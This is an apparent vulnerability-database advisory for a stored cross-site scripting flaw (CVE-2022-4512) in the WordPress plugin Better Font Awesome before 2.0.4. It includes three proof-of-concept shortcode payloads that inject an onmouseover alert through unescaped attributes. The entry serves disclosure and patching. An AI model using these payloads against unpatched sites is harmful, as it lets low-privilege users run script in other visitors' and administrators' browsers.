Lucene search
Lana CodesWPVDB-ID:7957F355-C767-4F59-BB28-0302D33386A6HistoryJan 18, 2023 - 12:00 a.m.
Better Font Awesome < 2.0.4 - Contributor+ Stored XSS
2023-01-1800:00:00
Lana Codes
wpscan.com
11
font awesome vulnerability
contributor role
stored xss
shortcode attributes
cross-site scripting
EPSS
0.001
Percentile
25.5%
The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.
PoC
[icon name=‘flag’ class=‘4x border’ title=‘" onmouseover="alert(/XSS/)’] [icon name=‘flag’ unprefixed_class=‘" onmouseover="alert(/XSS/)//’] [icon name=‘flag’ size=‘" onmouseover="alert(/XSS/)//’]
Related
cve
cve
CVE-2022-4512
2023-02-13 15:15:17
cvelist
cvelist
CVE-2022-4512 Better Font Awesome < 2.0.4 - Contributor+ Stored XSS
2023-02-13 14:32:16
prion
prion
Cross site scripting
2023-02-13 15:15:00
nvd
nvd
CVE-2022-4512
2023-02-13 15:15:17
openvas
openvas
WordPress Better Font Awesome Plugin < 2.0.4 XSS Vulnerability
2023-07-21 00:00:00
wpexploit
wpexploit
Better Font Awesome < 2.0.4 - Contributor+ Stored XSS
2023-01-18 00:00:00